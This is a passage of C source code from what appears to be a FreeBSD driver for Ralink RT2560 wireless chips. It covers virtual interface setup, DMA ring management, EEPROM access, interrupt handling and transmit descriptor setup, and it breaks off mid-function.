switch (opmode) { case IEEE80211_M_STA: case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: case IEEE80211_M_MONITOR: case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: /* XXXRP: TBD */ if (!TAILQ_EMPTY(&ic->ic_vaps)) { if_printf(ifp, "only 1 vap supported\n"); return NULL; } if (opmode == IEEE80211_M_STA) flags |= IEEE80211_CLONE_NOBEACONS; break; case IEEE80211_M_WDS: if (TAILQ_EMPTY(&ic->ic_vaps) || ic->ic_opmode != IEEE80211_M_HOSTAP) { if_printf(ifp, "wds only supported in ap mode\n"); return NULL; } /* * Silently remove any request for a unique * bssid; WDS vap's always share the local * mac address. */ flags &= ~IEEE80211_CLONE_BSSID; break; default: if_printf(ifp, "unknown opmode %d\n", opmode); return NULL; } rvp = (struct rt2560_vap *) malloc(sizeof(struct rt2560_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (rvp == NULL) return NULL; vap = &rvp->ral_vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); /* override state transition machine */ rvp->ral_newstate = vap->iv_newstate; vap->iv_newstate = rt2560_newstate; vap->iv_update_beacon = rt2560_beacon_update; ieee80211_ratectl_init(vap); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); if (TAILQ_FIRST(&ic->ic_vaps) == vap) ic->ic_opmode = opmode; return vap; } static void rt2560_vap_delete(struct ieee80211vap *vap) { struct rt2560_vap *rvp = RT2560_VAP(vap); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(rvp, M_80211_VAP); } void rt2560_resume(void *xsc) { struct rt2560_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; if (ifp->if_flags & IFF_UP) rt2560_init(sc); } static void rt2560_dma_map_addr(void *arg, bus_dma_segment_t *segs, int nseg, int error) { if (error != 0) return; KASSERT(nseg == 1, ("too many DMA segments, %d should be 1", nseg)); *(bus_addr_t *)arg = segs[0].ds_addr; } static int rt2560_alloc_tx_ring(struct rt2560_softc *sc, struct rt2560_tx_ring *ring, int count) { int i, error; ring->count = count; ring->queued = 0; ring->cur = ring->next = 0; ring->cur_encrypt = ring->next_encrypt = 0; error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, count * RT2560_TX_DESC_SIZE, 1, count * RT2560_TX_DESC_SIZE, 0, NULL, NULL, &ring->desc_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create desc DMA tag\n"); goto fail; } error = bus_dmamem_alloc(ring->desc_dmat, (void **)&ring->desc, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &ring->desc_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(ring->desc_dmat, ring->desc_map, ring->desc, count * RT2560_TX_DESC_SIZE, rt2560_dma_map_addr, &ring->physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load desc DMA map\n"); goto fail; } ring->data = malloc(count * sizeof (struct rt2560_tx_data), M_DEVBUF, M_NOWAIT | M_ZERO); if (ring->data == NULL) { device_printf(sc->sc_dev, "could not allocate soft data\n"); error = ENOMEM; goto fail; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, RT2560_MAX_SCATTER, MCLBYTES, 0, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create data DMA tag\n"); goto fail; } for (i = 0; i < count; i++) { error = bus_dmamap_create(ring->data_dmat, 0, &ring->data[i].map); if (error != 0) { device_printf(sc->sc_dev, "could not create DMA map\n"); goto fail; } } return 0; fail: rt2560_free_tx_ring(sc, ring); return error; } static void rt2560_reset_tx_ring(struct rt2560_softc *sc, struct rt2560_tx_ring *ring) { struct rt2560_tx_desc *desc; struct rt2560_tx_data *data; int i; for (i = 0; i < ring->count; i++) { desc = &ring->desc[i]; data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; } desc->flags = 0; } bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); ring->queued = 0; ring->cur = ring->next = 0; ring->cur_encrypt = ring->next_encrypt = 0; } static void rt2560_free_tx_ring(struct rt2560_softc *sc, struct rt2560_tx_ring *ring) { struct rt2560_tx_data *data; int i; if (ring->desc != NULL) { bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->desc_dmat, ring->desc_map); bus_dmamem_free(ring->desc_dmat, ring->desc, ring->desc_map); } if (ring->desc_dmat != NULL) bus_dma_tag_destroy(ring->desc_dmat); if (ring->data != NULL) { for (i = 0; i < ring->count; i++) { data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->ni != NULL) ieee80211_free_node(data->ni); if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } free(ring->data, M_DEVBUF); } if (ring->data_dmat != NULL) bus_dma_tag_destroy(ring->data_dmat); } static int rt2560_alloc_rx_ring(struct rt2560_softc *sc, struct rt2560_rx_ring *ring, int count) { struct rt2560_rx_desc *desc; struct rt2560_rx_data *data; bus_addr_t physaddr; int i, error; ring->count = count; ring->cur = ring->next = 0; ring->cur_decrypt = 0; error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, count * RT2560_RX_DESC_SIZE, 1, count * RT2560_RX_DESC_SIZE, 0, NULL, NULL, &ring->desc_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create desc DMA tag\n"); goto fail; } error = bus_dmamem_alloc(ring->desc_dmat, (void **)&ring->desc, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &ring->desc_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(ring->desc_dmat, ring->desc_map, ring->desc, count * RT2560_RX_DESC_SIZE, rt2560_dma_map_addr, &ring->physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load desc DMA map\n"); goto fail; } ring->data = malloc(count * sizeof (struct rt2560_rx_data), M_DEVBUF, M_NOWAIT | M_ZERO); if (ring->data == NULL) { device_printf(sc->sc_dev, "could not allocate soft data\n"); error = ENOMEM; goto fail; } /* * Pre-allocate Rx buffers and populate Rx ring. */ error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, 1, MCLBYTES, 0, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create data DMA tag\n"); goto fail; } for (i = 0; i < count; i++) { desc = &sc->rxq.desc[i]; data = &sc->rxq.data[i]; error = bus_dmamap_create(ring->data_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "could not create DMA map\n"); goto fail; } data->m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (data->m == NULL) { device_printf(sc->sc_dev, "could not allocate rx mbuf\n"); error = ENOMEM; goto fail; } error = bus_dmamap_load(ring->data_dmat, data->map, mtod(data->m, void *), MCLBYTES, rt2560_dma_map_addr, &physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load rx buf DMA map"); goto fail; } desc->flags = htole32(RT2560_RX_BUSY); desc->physaddr = htole32(physaddr); } bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); return 0; fail: rt2560_free_rx_ring(sc, ring); return error; } static void rt2560_reset_rx_ring(struct rt2560_softc *sc, struct rt2560_rx_ring *ring) { int i; for (i = 0; i < ring->count; i++) { ring->desc[i].flags = htole32(RT2560_RX_BUSY); ring->data[i].drop = 0; } bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); ring->cur = ring->next = 0; ring->cur_decrypt = 0; } static void rt2560_free_rx_ring(struct rt2560_softc *sc, struct rt2560_rx_ring *ring) { struct rt2560_rx_data *data; int i; if (ring->desc != NULL) { bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->desc_dmat, ring->desc_map); bus_dmamem_free(ring->desc_dmat, ring->desc, ring->desc_map); } if (ring->desc_dmat != NULL) bus_dma_tag_destroy(ring->desc_dmat); if (ring->data != NULL) { for (i = 0; i < ring->count; i++) { data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } free(ring->data, M_DEVBUF); } if (ring->data_dmat != NULL) bus_dma_tag_destroy(ring->data_dmat); } static int rt2560_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct rt2560_vap *rvp = RT2560_VAP(vap); struct ifnet *ifp = vap->iv_ic->ic_ifp; struct rt2560_softc *sc = ifp->if_softc; int error; if (nstate == IEEE80211_S_INIT && vap->iv_state == IEEE80211_S_RUN) { /* abort TSF synchronization */ RAL_WRITE(sc, RT2560_CSR14, 0); /* turn association led off */ rt2560_update_led(sc, 0, 0); } error = rvp->ral_newstate(vap, nstate, arg); if (error == 0 && nstate == IEEE80211_S_RUN) { struct ieee80211_node *ni = vap->iv_bss; struct mbuf *m; if (vap->iv_opmode != IEEE80211_M_MONITOR) { rt2560_update_plcp(sc); rt2560_set_basicrates(sc, &ni->ni_rates); rt2560_set_bssid(sc, ni->ni_bssid); } if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_IBSS || vap->iv_opmode == IEEE80211_M_MBSS) { m = ieee80211_beacon_alloc(ni, &rvp->ral_bo); if (m == NULL) { if_printf(ifp, "could not allocate beacon\n"); return ENOBUFS; } ieee80211_ref_node(ni); error = rt2560_tx_bcn(sc, m, ni); if (error != 0) return error; } /* turn assocation led on */ rt2560_update_led(sc, 1, 0); if (vap->iv_opmode != IEEE80211_M_MONITOR) rt2560_enable_tsf_sync(sc); else rt2560_enable_tsf(sc); } return error; } /* * Read 16 bits at address 'addr' from the serial EEPROM (either 93C46 or * 93C66). */ static uint16_t rt2560_eeprom_read(struct rt2560_softc *sc, uint8_t addr) { uint32_t tmp; uint16_t val; int n; /* clock C once before the first command */ RT2560_EEPROM_CTL(sc, 0); RT2560_EEPROM_CTL(sc, RT2560_S); RT2560_EEPROM_CTL(sc, RT2560_S | RT2560_C); RT2560_EEPROM_CTL(sc, RT2560_S); /* write start bit (1) */ RT2560_EEPROM_CTL(sc, RT2560_S | RT2560_D); RT2560_EEPROM_CTL(sc, RT2560_S | RT2560_D | RT2560_C); /* write READ opcode (10) */ RT2560_EEPROM_CTL(sc, RT2560_S | RT2560_D); RT2560_EEPROM_CTL(sc, RT2560_S | RT2560_D | RT2560_C); RT2560_EEPROM_CTL(sc, RT2560_S); RT2560_EEPROM_CTL(sc, RT2560_S | RT2560_C); /* write address (A5-A0 or A7-A0) */ n = (RAL_READ(sc, RT2560_CSR21) & RT2560_93C46) ? 5 : 7; for (; n >= 0; n--) { RT2560_EEPROM_CTL(sc, RT2560_S | (((addr >> n) & 1) << RT2560_SHIFT_D)); RT2560_EEPROM_CTL(sc, RT2560_S | (((addr >> n) & 1) << RT2560_SHIFT_D) | RT2560_C); } RT2560_EEPROM_CTL(sc, RT2560_S); /* read data Q15-Q0 */ val = 0; for (n = 15; n >= 0; n--) { RT2560_EEPROM_CTL(sc, RT2560_S | RT2560_C); tmp = RAL_READ(sc, RT2560_CSR21); val |= ((tmp & RT2560_Q) >> RT2560_SHIFT_Q) << n; RT2560_EEPROM_CTL(sc, RT2560_S); } RT2560_EEPROM_CTL(sc, 0); /* clear Chip Select and clock C */ RT2560_EEPROM_CTL(sc, RT2560_S); RT2560_EEPROM_CTL(sc, 0); RT2560_EEPROM_CTL(sc, RT2560_C); return val; } /* * Some frames were processed by the hardware cipher engine and are ready for * transmission. */ static void rt2560_encryption_intr(struct rt2560_softc *sc) { struct rt2560_tx_desc *desc; int hw; /* retrieve last descriptor index processed by cipher engine */ hw = RAL_READ(sc, RT2560_SECCSR1) - sc->txq.physaddr; hw /= RT2560_TX_DESC_SIZE; bus_dmamap_sync(sc->txq.desc_dmat, sc->txq.desc_map, BUS_DMASYNC_POSTREAD); while (sc->txq.next_encrypt != hw) { if (sc->txq.next_encrypt == sc->txq.cur_encrypt) { printf("hw encrypt %d, cur_encrypt %d\n", hw, sc->txq.cur_encrypt); break; } desc = &sc->txq.desc[sc->txq.next_encrypt]; if ((le32toh(desc->flags) & RT2560_TX_BUSY) || (le32toh(desc->flags) & RT2560_TX_CIPHER_BUSY)) break; /* for TKIP, swap eiv field to fix a bug in ASIC */ if ((le32toh(desc->flags) & RT2560_TX_CIPHER_MASK) == RT2560_TX_CIPHER_TKIP) desc->eiv = bswap32(desc->eiv); /* mark the frame ready for transmission */ desc->flags |= htole32(RT2560_TX_VALID); desc->flags |= htole32(RT2560_TX_BUSY); DPRINTFN(sc, 15, "encryption done idx=%u\n", sc->txq.next_encrypt); sc->txq.next_encrypt = (sc->txq.next_encrypt + 1) % RT2560_TX_RING_COUNT; } bus_dmamap_sync(sc->txq.desc_dmat, sc->txq.desc_map, BUS_DMASYNC_PREWRITE); /* kick Tx */ RAL_WRITE(sc, RT2560_TXCSR0, RT2560_KICK_TX); } static void rt2560_tx_intr(struct rt2560_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct rt2560_tx_desc *desc; struct rt2560_tx_data *data; struct mbuf *m; uint32_t flags; int retrycnt; struct ieee80211vap *vap; struct ieee80211_node *ni; bus_dmamap_sync(sc->txq.desc_dmat, sc->txq.desc_map, BUS_DMASYNC_POSTREAD); for (;;) { desc = &sc->txq.desc[sc->txq.next]; data = &sc->txq.data[sc->txq.next]; flags = le32toh(desc->flags); if ((flags & RT2560_TX_BUSY) || (flags & RT2560_TX_CIPHER_BUSY) || !(flags & RT2560_TX_VALID)) break; m = data->m; ni = data->ni; vap = ni->ni_vap; switch (flags & RT2560_TX_RESULT_MASK) { case RT2560_TX_SUCCESS: retrycnt = 0; DPRINTFN(sc, 10, "%s\n", "data frame sent successfully"); if (data->rix != IEEE80211_FIXED_RATE_NONE) ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_SUCCESS, &retrycnt, NULL); ifp->if_opackets++; break; case RT2560_TX_SUCCESS_RETRY: retrycnt = RT2560_TX_RETRYCNT(flags); DPRINTFN(sc, 9, "data frame sent after %u retries\n", retrycnt); if (data->rix != IEEE80211_FIXED_RATE_NONE) ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_SUCCESS, &retrycnt, NULL); ifp->if_opackets++; break; case RT2560_TX_FAIL_RETRY: retrycnt = RT2560_TX_RETRYCNT(flags); DPRINTFN(sc, 9, "data frame failed after %d retries\n", retrycnt); if (data->rix != IEEE80211_FIXED_RATE_NONE) ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_FAILURE, &retrycnt, NULL); ifp->if_oerrors++; break; case RT2560_TX_FAIL_INVALID: case RT2560_TX_FAIL_OTHER: default: device_printf(sc->sc_dev, "sending data frame failed " "0x%08x\n", flags); ifp->if_oerrors++; } bus_dmamap_sync(sc->txq.data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->txq.data_dmat, data->map); m_freem(m); data->m = NULL; ieee80211_free_node(data->ni); data->ni = NULL; /* descriptor is no longer valid */ desc->flags &= ~htole32(RT2560_TX_VALID); DPRINTFN(sc, 15, "tx done idx=%u\n", sc->txq.next); sc->txq.queued--; sc->txq.next = (sc->txq.next + 1) % RT2560_TX_RING_COUNT; } bus_dmamap_sync(sc->txq.desc_dmat, sc->txq.desc_map, BUS_DMASYNC_PREWRITE); if (sc->prioq.queued == 0 && sc->txq.queued == 0) sc->sc_tx_timer = 0; if (sc->txq.queued < RT2560_TX_RING_COUNT - 1) { sc->sc_flags &= ~RT2560_F_DATA_OACTIVE; if ((sc->sc_flags & (RT2560_F_DATA_OACTIVE | RT2560_F_PRIO_OACTIVE)) == 0) ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; rt2560_start_locked(ifp); } } static void rt2560_prio_intr(struct rt2560_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct rt2560_tx_desc *desc; struct rt2560_tx_data *data; struct ieee80211_node *ni; struct mbuf *m; int flags; bus_dmamap_sync(sc->prioq.desc_dmat, sc->prioq.desc_map, BUS_DMASYNC_POSTREAD); for (;;) { desc = &sc->prioq.desc[sc->prioq.next]; data = &sc->prioq.data[sc->prioq.next]; flags = le32toh(desc->flags); if ((flags & RT2560_TX_BUSY) || (flags & RT2560_TX_VALID) == 0) break; switch (flags & RT2560_TX_RESULT_MASK) { case RT2560_TX_SUCCESS: DPRINTFN(sc, 10, "%s\n", "mgt frame sent successfully"); break; case RT2560_TX_SUCCESS_RETRY: DPRINTFN(sc, 9, "mgt frame sent after %u retries\n", (flags >> 5) & 0x7); break; case RT2560_TX_FAIL_RETRY: DPRINTFN(sc, 9, "%s\n", "sending mgt frame failed (too much retries)"); break; case RT2560_TX_FAIL_INVALID: case RT2560_TX_FAIL_OTHER: default: device_printf(sc->sc_dev, "sending mgt frame failed " "0x%08x\n", flags); break; } bus_dmamap_sync(sc->prioq.data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->prioq.data_dmat, data->map); m = data->m; data->m = NULL; ni = data->ni; data->ni = NULL; /* descriptor is no longer valid */ desc->flags &= ~htole32(RT2560_TX_VALID); DPRINTFN(sc, 15, "prio done idx=%u\n", sc->prioq.next); sc->prioq.queued--; sc->prioq.next = (sc->prioq.next + 1) % RT2560_PRIO_RING_COUNT; if (m->m_flags & M_TXCB) ieee80211_process_callback(ni, m, (flags & RT2560_TX_RESULT_MASK) &~ (RT2560_TX_SUCCESS | RT2560_TX_SUCCESS_RETRY)); m_freem(m); ieee80211_free_node(ni); } bus_dmamap_sync(sc->prioq.desc_dmat, sc->prioq.desc_map, BUS_DMASYNC_PREWRITE); if (sc->prioq.queued == 0 && sc->txq.queued == 0) sc->sc_tx_timer = 0; if (sc->prioq.queued < RT2560_PRIO_RING_COUNT) { sc->sc_flags &= ~RT2560_F_PRIO_OACTIVE; if ((sc->sc_flags & (RT2560_F_DATA_OACTIVE | RT2560_F_PRIO_OACTIVE)) == 0) ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; rt2560_start_locked(ifp); } } /* * Some frames were processed by the hardware cipher engine and are ready for * handoff to the IEEE802.11 layer. */ static void rt2560_decryption_intr(struct rt2560_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct rt2560_rx_desc *desc; struct rt2560_rx_data *data; bus_addr_t physaddr; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *mnew, *m; int hw, error; int8_t rssi, nf; /* retrieve last decriptor index processed by cipher engine */ hw = RAL_READ(sc, RT2560_SECCSR0) - sc->rxq.physaddr; hw /= RT2560_RX_DESC_SIZE; bus_dmamap_sync(sc->rxq.desc_dmat, sc->rxq.desc_map, BUS_DMASYNC_POSTREAD); for (; sc->rxq.cur_decrypt != hw;) { desc = &sc->rxq.desc[sc->rxq.cur_decrypt]; data = &sc->rxq.data[sc->rxq.cur_decrypt]; if ((le32toh(desc->flags) & RT2560_RX_BUSY) || (le32toh(desc->flags) & RT2560_RX_CIPHER_BUSY)) break; if (data->drop) { ifp->if_ierrors++; goto skip; } if ((le32toh(desc->flags) & RT2560_RX_CIPHER_MASK) != 0 && (le32toh(desc->flags) & RT2560_RX_ICV_ERROR)) { ifp->if_ierrors++; goto skip; } /* * Try to allocate a new mbuf for this ring element and load it * before processing the current mbuf. If the ring element * cannot be loaded, drop the received packet and reuse the old * mbuf. In the unlikely case that the old mbuf can't be * reloaded either, explicitly panic. */ mnew = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (mnew == NULL) { ifp->if_ierrors++; goto skip; } bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(sc->rxq.data_dmat, data->map); error = bus_dmamap_load(sc->rxq.data_dmat, data->map, mtod(mnew, void *), MCLBYTES, rt2560_dma_map_addr, &physaddr, 0); if (error != 0) { m_freem(mnew); /* try to reload the old mbuf */ error = bus_dmamap_load(sc->rxq.data_dmat, data->map, mtod(data->m, void *), MCLBYTES, rt2560_dma_map_addr, &physaddr, 0); if (error != 0) { /* very unlikely that it will fail... */ panic("%s: could not load old rx mbuf", device_get_name(sc->sc_dev)); } ifp->if_ierrors++; goto skip; } /* * New mbuf successfully loaded, update Rx ring and continue * processing. */ m = data->m; data->m = mnew; desc->physaddr = htole32(physaddr); /* finalize mbuf */ m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = (le32toh(desc->flags) >> 16) & 0xfff; rssi = RT2560_RSSI(sc, desc->rssi); nf = RT2560_NOISE_FLOOR; if (ieee80211_radiotap_active(ic)) { struct rt2560_rx_radiotap_header *tap = &sc->sc_rxtap; uint32_t tsf_lo, tsf_hi; /* get timestamp (low and high 32 bits) */ tsf_hi = RAL_READ(sc, RT2560_CSR17); tsf_lo = RAL_READ(sc, RT2560_CSR16); tap->wr_tsf = htole64(((uint64_t)tsf_hi << 32) | tsf_lo); tap->wr_flags = 0; tap->wr_rate = ieee80211_plcp2rate(desc->rate, (desc->flags & htole32(RT2560_RX_OFDM)) ? IEEE80211_T_OFDM : IEEE80211_T_CCK); tap->wr_antenna = sc->rx_ant; tap->wr_antsignal = nf + rssi; tap->wr_antnoise = nf; } sc->sc_flags |= RT2560_F_INPUT_RUNNING; RAL_UNLOCK(sc); wh = mtod(m, struct ieee80211_frame *); ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); if (ni != NULL) { (void) ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, nf); RAL_LOCK(sc); sc->sc_flags &= ~RT2560_F_INPUT_RUNNING; skip: desc->flags = htole32(RT2560_RX_BUSY); DPRINTFN(sc, 15, "decryption done idx=%u\n", sc->rxq.cur_decrypt); sc->rxq.cur_decrypt = (sc->rxq.cur_decrypt + 1) % RT2560_RX_RING_COUNT; } bus_dmamap_sync(sc->rxq.desc_dmat, sc->rxq.desc_map, BUS_DMASYNC_PREWRITE); } /* * Some frames were received. Pass them to the hardware cipher engine before * sending them to the 802.11 layer. */ static void rt2560_rx_intr(struct rt2560_softc *sc) { struct rt2560_rx_desc *desc; struct rt2560_rx_data *data; bus_dmamap_sync(sc->rxq.desc_dmat, sc->rxq.desc_map, BUS_DMASYNC_POSTREAD); for (;;) { desc = &sc->rxq.desc[sc->rxq.cur]; data = &sc->rxq.data[sc->rxq.cur]; if ((le32toh(desc->flags) & RT2560_RX_BUSY) || (le32toh(desc->flags) & RT2560_RX_CIPHER_BUSY)) break; data->drop = 0; if ((le32toh(desc->flags) & RT2560_RX_PHY_ERROR) || (le32toh(desc->flags) & RT2560_RX_CRC_ERROR)) { /* * This should not happen since we did not request * to receive those frames when we filled RXCSR0. */ DPRINTFN(sc, 5, "PHY or CRC error flags 0x%08x\n", le32toh(desc->flags)); data->drop = 1; } if (((le32toh(desc->flags) >> 16) & 0xfff) > MCLBYTES) { DPRINTFN(sc, 5, "%s\n", "bad length"); data->drop = 1; } /* mark the frame for decryption */ desc->flags |= htole32(RT2560_RX_CIPHER_BUSY); DPRINTFN(sc, 15, "rx done idx=%u\n", sc->rxq.cur); sc->rxq.cur = (sc->rxq.cur + 1) % RT2560_RX_RING_COUNT; } bus_dmamap_sync(sc->rxq.desc_dmat, sc->rxq.desc_map, BUS_DMASYNC_PREWRITE); /* kick decrypt */ RAL_WRITE(sc, RT2560_SECCSR0, RT2560_KICK_DECRYPT); } static void rt2560_beacon_update(struct ieee80211vap *vap, int item) { struct rt2560_vap *rvp = RT2560_VAP(vap); struct ieee80211_beacon_offsets *bo = &rvp->ral_bo; setbit(bo->bo_flags, item); } /* * This function is called periodically in IBSS mode when a new beacon must be * sent out. */ static void rt2560_beacon_expire(struct rt2560_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct rt2560_vap *rvp = RT2560_VAP(vap); struct rt2560_tx_data *data; if (ic->ic_opmode != IEEE80211_M_IBSS && ic->ic_opmode != IEEE80211_M_HOSTAP && ic->ic_opmode != IEEE80211_M_MBSS) return; data = &sc->bcnq.data[sc->bcnq.next]; /* * Don't send beacon if bsschan isn't set */ if (data->ni == NULL) return; bus_dmamap_sync(sc->bcnq.data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->bcnq.data_dmat, data->map); /* XXX 1 =>'s mcast frames which means all PS sta's will wakeup! */ ieee80211_beacon_update(data->ni, &rvp->ral_bo, data->m, 1); rt2560_tx_bcn(sc, data->m, data->ni); DPRINTFN(sc, 15, "%s", "beacon expired\n"); sc->bcnq.next = (sc->bcnq.next + 1) % RT2560_BEACON_RING_COUNT; } /* ARGSUSED */ static void rt2560_wakeup_expire(struct rt2560_softc *sc) { DPRINTFN(sc, 2, "%s", "wakeup expired\n"); } void rt2560_intr(void *arg) { struct rt2560_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; uint32_t r; RAL_LOCK(sc); /* disable interrupts */ RAL_WRITE(sc, RT2560_CSR8, 0xffffffff); /* don't re-enable interrupts if we're shutting down */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { RAL_UNLOCK(sc); return; } r = RAL_READ(sc, RT2560_CSR7); RAL_WRITE(sc, RT2560_CSR7, r); if (r & RT2560_BEACON_EXPIRE) rt2560_beacon_expire(sc); if (r & RT2560_WAKEUP_EXPIRE) rt2560_wakeup_expire(sc); if (r & RT2560_ENCRYPTION_DONE) rt2560_encryption_intr(sc); if (r & RT2560_TX_DONE) rt2560_tx_intr(sc); if (r & RT2560_PRIO_DONE) rt2560_prio_intr(sc); if (r & RT2560_DECRYPTION_DONE) rt2560_decryption_intr(sc); if (r & RT2560_RX_DONE) { rt2560_rx_intr(sc); rt2560_encryption_intr(sc); } /* re-enable interrupts */ RAL_WRITE(sc, RT2560_CSR8, RT2560_INTR_MASK); RAL_UNLOCK(sc); } #define RAL_SIFS 10 /* us */ #define RT2560_TXRX_TURNAROUND 10 /* us */ static uint8_t rt2560_plcp_signal(int rate) { switch (rate) { /* OFDM rates (cf IEEE Std 802.11a-1999, pp. 14 Table 80) */ case 12: return 0xb; case 18: return 0xf; case 24: return 0xa; case 36: return 0xe; case 48: return 0x9; case 72: return 0xd; case 96: return 0x8; case 108: return 0xc; /* CCK rates (NB: not IEEE std, device-specific) */ case 2: return 0x0; case 4: return 0x1; case 11: return 0x2; case 22: return 0x3; } return 0xff; /* XXX unsupported/unknown rate */ } static void rt2560_setup_tx_desc(struct rt2560_softc *sc, struct rt2560_tx_desc *desc, uint32_t flags, int len, int rate, int encrypt, bus_addr_t physaddr) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t plcp_length; int remainder; desc->flags = htole32(flags); desc->flags |= htole32(len << 16); desc->physaddr = htole32(physaddr); desc->wme = htole16( RT2560_AIFSN(2) | RT2560_LOGCWMIN(3) | RT2560_LOGCWMAX(8)); /* setup PLCP fields */ desc->plcp_signal = rt2560_plcp_signal(rate); desc->plcp_service = 4; len += IEEE80211_CRC_LEN; if (ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_OFDM) { desc->flags |= htole32(RT2560_TX_OFDM); plcp_length = len & 0xfff; desc->plcp_length_hi = plcp_length >> 6; desc->plcp_length_lo = plcp_length & 0x3f; } else { plcp_length = (16 * len + rate - 1) / rate; if (rate == 22) { remainder = (16 * len) % 22; if (remainder != 0 && remainder < 7) desc->plcp_service |= RT2560_PLCP_LENGEXT; } desc->plcp_length_hi = plcp_length >> 8; desc->plcp_length_lo = plcp_length & 0xff; if (rate != 2 && (ic->ic_flags & IEEE80211_F_SHPREAMBLE)) desc->plcp_signal |= 0x08; } if (!encrypt) desc->flags |= htole32(RT2560_TX_VALID); desc->flags |= encrypt ? htole32(RT2560_TX_CIPHER_BUSY) : htole32(RT2560_TX_BUSY); } static int rt2560_tx_bcn(struct rt2560_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct rt2560_tx_desc *desc; struct rt2560_tx_data *data; bus_dma_segment_t segs[RT2560_MAX_SCATTER]; int nsegs, rate, error; desc = &sc->bcnq.desc[sc->bcnq.cur]; data = &sc->bcnq.data[sc->bcnq.cur]; /* XXX maybe a separate beacon rate? */ rate = vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)].mgmtrate; error = bus_dmamap_load_mbuf_sg(sc->bcnq.data_dmat, data->map, m0, segs, &nsegs, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", 